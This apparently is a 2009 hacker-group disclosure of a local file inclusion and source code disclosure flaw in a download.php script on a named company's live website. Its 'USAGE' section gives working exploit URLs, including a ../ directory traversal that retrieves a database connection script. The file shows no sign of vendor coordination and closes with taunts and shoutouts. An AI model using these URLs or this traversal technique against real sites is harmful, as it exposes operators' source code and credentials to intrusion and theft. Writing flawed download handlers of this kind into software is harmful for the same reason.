==============================================================
===================[¦¦¦¦TeamQuarantine¦¦¦¦]===================
=====================[¦¦¦¦ 7-15-2009 ¦¦¦¦]====================
============[¦¦¦¦TeamQuarantine@hushmail.com¦¦¦¦]=============
===============[¦¦¦¦ Author: St00pidMnky ¦¦¦¦]================
==============================================================
===============[¦¦¦¦ http://www.vopak.com ¦¦¦¦]===============
============[¦¦¦¦ LFI/Source Code Disclosure ¦¦¦¦]============
==============================================================
==============================================================
www.vopak.com suffers form a source code disclosure vulnerability
as well as Local File Inclusion vulnerability when calling 
files with download.php

==============================================================
======================[¦¦¦¦ USAGE: ¦¦¦¦]======================
==============================================================
Vulnerable: download.php?file=

download.php can be used to call almost any file on the 
webserver.

Example:
http://www.vopak.com/media/download.php?file=download.php

Even more frightening:
http://www.vopak.com/media/download.php?file=../scripts/cls_dataConnect.php

==============================================================
====================[¦¦¦¦ FINAL WORD ¦¦¦¦]====================
==============================================================
Take this as a prime example of how NOT to code your file
download scripts.  This script even went as far as to 
prevent certain extensions (mp3) from being downloaded, but failed
to forsee the event of someone transversing directories or 
including a .php extension.   tsk-tsk

==============================================================
======================[¦¦¦¦ SHOUTZ ¦¦¦¦]======================
==============================================================
Everyone at TeamQuarantine!
Gm0, Eolas_Gadai